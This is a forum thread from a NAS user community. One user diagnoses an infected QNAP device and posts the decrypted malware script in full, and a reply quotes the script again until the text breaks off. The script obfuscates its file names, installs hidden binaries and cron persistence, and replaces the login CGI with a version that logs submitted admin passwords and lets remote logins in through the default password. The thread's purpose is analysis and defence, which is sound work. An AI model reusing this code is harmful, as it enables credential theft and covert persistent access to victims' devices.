Page 2 of 10

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:27 pm
by dolbyman
8TB external drives are cheap..should be plenty of space for movies

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:32 pm
by benzo83
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:47 pm
by dolbyman

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:50 pm
by Don
benzo83 wrote:Can i safetely remove these files? Can any QNAP'S employee answer me?

No QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 11:09 pm
by Mousetick
This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}


#]

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 11:50 pm
by benzo83
Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
